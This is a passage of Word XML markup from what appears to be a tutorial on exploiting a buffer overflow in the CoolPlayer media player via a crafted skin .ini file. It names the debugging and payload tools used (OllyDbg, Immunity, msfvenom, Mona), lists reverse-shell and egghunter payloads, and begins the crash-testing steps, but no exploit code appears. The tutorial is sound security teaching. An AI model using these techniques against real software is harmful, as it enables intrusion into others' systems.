              <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The last screen is the options box available by selecting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>options</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the right click menu. This includes a host of options to allow for greater control over the application. This is split into general settings, which control issues such as usability settings; output settings, which is all about audio output; and skin options, which allows the graphical interface to be changed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4971" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BC4D2FF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
              <w:ind w:left="284"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640010AE" wp14:editId="718CC6A3">
                  <wp:extent cx="2790720" cy="3701520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="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790720" cy="3701520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00164B2A" w14:paraId="4C7E829E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2894" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="699F2303" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40AD5CD7" wp14:editId="55CF873C">
                  <wp:extent cx="1838879" cy="1314360"/>
                  <wp:effectExtent l="0" t="0" r="8971" b="90"/>
                  <wp:docPr id="5"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838879" cy="1314360"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1603" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="190F0821" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1583EE8D" wp14:editId="01636454">
                  <wp:extent cx="914400" cy="1347480"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5070"/>
                  <wp:docPr id="6"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914400" cy="1347480"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4971" w:type="dxa"/>
            <w:vMerge/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70B78BE3" w14:textId="77777777" w:rsidR="00AD2FFF" w:rsidRDefault="00AD2FFF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C65CAAE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581D4289" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This application is particularly interesting because of the ability to upload skin files to the application. This facility is what allows for a buffer overflow to be executed against the application. This is due to improper memory handling, which does not validate the values inputted by the user. This is not enforced by default in “C”, which this application was programmed in, but can be manually implemented using OpenBSD functions, such as “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strlcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” and “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strlcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” (Team, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E6CFD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc71563997"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="73F82356" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">There were </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> different tools used throughout this tutorial, however there were four main ones that will be explained below. It should be noted that this tutorial can be completed with different tools. However, this is not recommended as the tutorial contains screenshots and instructions tailored to these tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11709D25" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc71563998"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ollydebug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28495482" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ollydebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a debugging tool that allows the user to view a variety of information about the target application. This includes the contents of the Registers. This is incredibly important as it includes the contents of the EIP. It also includes the contents of the stack, which can be useful for troubleshooting by seeing what was on the stack when the program crashed. By analysing the information gathered by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ollydebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>, it will be possible to craft a buffer overflow exploit for the target application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203BBE52" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc71563999"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2F010105" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Immunity is very similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ollydebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> but with some differences. Immunity contains extra features that, while more complicated, allow for a more thorough analysis of the target application, which can be necessary for more complex attacks. One of the added benefits is the ability to run useful script commands that can be used to further enumerate the application and thereby allow further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490DD41" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have used Immunity before or are comfortable with using this type of software, then it is possible to use this in place of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ollydebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the earlier stages of the tutorial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484E88B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc71564000"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09DA05D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is best described as a payload generator. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a host of useful payloads, however, most of these will not be used during this tutorial. The three payloads used in this tutorial are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F1826" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="714" w:hanging="357"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Messagebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FEE13C4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="714" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B791542" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4329"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="714" w:hanging="357"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F312A4B" w14:textId="4103E46B" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3615"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">These require the setting of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> different</w:t>
      </w:r>
      <w:r w:rsidR="00996A42">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>, which will be discussed in the sections in which these payloads are utilised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C304441" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc71564001"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Mona</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="42B7569E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Mona is a collection of python scripts that allow for the identification of instances of specified strings within a target application, as well as the generation of specific, complex payloads. These are very useful specifically when looking at buffer overflow attacks, as these kinds of attacks rely on the ability to locate and manipulate memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82BF8C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc71564002"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Procedure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="48FB10A9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc71564003"/>
      <w:r>
        <w:t>Preparation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="62BB0313" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF" w:rsidP="00C77908">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This tutorial will comprise multiple stages. Each stage will provide an increasingly complex version of the buffer overflow attack. The first stage will focus on the preparation for a successful attack. This includes verifying the vulnerability of the application and then gathering all the necessary information to implement a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B71EE62" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF" w:rsidP="00C77908">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The first step is to ascertain if the program is vulnerable to a buffer overflow attack. This can be done by submitting a long string that exceeds the expected input length. Using the Crash.pl file found in Appendix A – Crash.pl a file can be generated for this purpose. Then, submit this file according to the steps found below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2F075" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Submitting Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F7D96" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This section is important as it will be referenced thought the procedure when submitting a file to the application. Whenever “Submitting Files” is referenced this section should be consulted to ascertain the correct steps required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161CF76" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To submit a file to the application, right click on the application running and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0060D842" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Then, under skin, select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E550F28" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0C9A78" wp14:editId="478ED106">
            <wp:extent cx="3133800" cy="2601000"/>
            <wp:effectExtent l="0" t="0" r="9450" b="8850"/>
            <wp:docPr id="7"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133800" cy="2601000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF5B9E8" wp14:editId="09E9D43F">
            <wp:extent cx="1964160" cy="2590919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8"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964160" cy="2590919"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40332755" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Select the file you want to upload. It must be a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file and must start with the following. This should be set automatically in the .pl files, however, if issues with submission are encountered the first thing to check should be if the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file is formatted properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578B9C8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BCF3A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9A5EF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:top w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:left w:val="double" w:sz="24" w:space="4" w:color="000000"/>
          <w:bottom w:val="double" w:sz="24" w:space="1" w:color="000000"/>
          <w:right w:val="double" w:sz="24" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">The text following the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
